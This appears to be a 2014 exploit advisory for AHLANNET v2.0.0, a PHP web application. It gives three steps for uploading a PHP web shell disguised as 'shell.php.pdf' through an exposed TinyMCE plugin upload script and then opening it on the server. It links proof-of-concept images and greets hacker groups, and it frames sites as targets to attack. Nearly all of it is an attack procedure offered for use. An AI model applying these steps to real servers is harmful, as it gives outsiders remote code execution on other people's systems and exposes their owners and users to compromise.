facebook facebook twitter rss

AHLANNET v2.0.0 File Upload Vulnerability

Author: AnASsRc3 , Published: 28-04-2014
#########################################################################

# Exploit Title: [ AHLANNET v2.0.0 File Upload Vulnerability ]

# Date: [28-04-2014]

# Author: AnASsRc3

# Facebook : https://www.facebook.com/Anassrc3PageOfficille

# Category: [webapps]

# version : v2.0.0

# Platform : php

# vendor URL : http://www.ahlannet.co.il/

# Tested on: [Linux (backbox 13.3]

#########################################################################





[1] http://127.0.0.1/openconf/author/submit.php

& Make a Submission; iF "The submission is closed" ==> ^^ nExt tarGet



[2] http://127.0.0.1/admin****/jscripts/tiny_mce/plugins/advlink/mngiframepdf.php

upload your shEll shell.php.pdf


[3] Upload location: http://127.0.0.1/pics/shEll.php



==> p0c imaGe : http://im89.gulfup.com/pKRX8R.png

http://im89.gulfup.com/AKJ8lq.png





# Greet'z | hackers Marrocan| ALL Members Sec4Ever | LogiCoder Man & All my friends

Like us on Facebook :